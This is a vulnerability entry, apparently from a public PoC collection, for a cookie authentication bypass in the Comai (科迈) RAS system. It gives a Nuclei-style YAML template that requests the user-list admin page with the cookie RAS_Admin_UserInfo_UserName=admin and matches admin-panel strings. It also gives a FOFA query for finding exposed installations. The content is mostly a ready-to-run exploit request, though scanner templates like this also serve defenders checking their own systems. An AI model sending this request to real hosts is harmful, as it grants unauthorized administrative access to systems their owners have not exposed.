漏洞描述
Comai RAS system has cookie authentication overreach, when RAS_Admin_UserInfo_UserName is set to admin, the background can be accessed
comai-ras-cookie-bypass: Comai RAS System Cookie - Authentication Override
PoC代码[已公开]
id: comai-ras-cookie-bypass
info:
name: Comai RAS System Cookie - Authentication Override
author: SleepingBag945
severity: high
description: |
Comai RAS system has cookie authentication overreach, when RAS_Admin_UserInfo_UserName is set to admin, the background can be accessed
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%A7%91%E8%BF%88/%E7%A7%91%E8%BF%88%20RAS%E7%B3%BB%E7%BB%9F%20Cookie%E9%AA%8C%E8%AF%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E.md
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/maike-ras-cookie-bypass.yaml
metadata:
verified: true
max-request: 1
fofa-query: app="科迈-RAS系统"
tags: comai-ras,ras,kemai,vuln
http:
- raw:
- |
GET /Server/CmxUser.php?pgid=UserList HTTP/1.1
Host: {{Hostname}}
cookie: RAS_Admin_UserInfo_UserName=admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"?pgid=User_Show"
- "usingeKey"
- "MachineAmount"
- "AppLoginType"
- "TimeType"
condition: and
- type: status
status:
- 200
# digest: 490a004630440220133b5aac96a0af0d840afc57753d22cf61ecb1023eabef85447aa1123b5d62fd022076284766ffd5d9177fd82468f16fdcce55ff622d216fc9497f9f1d7416837847:922c64590222798bb761d5b6d8e72950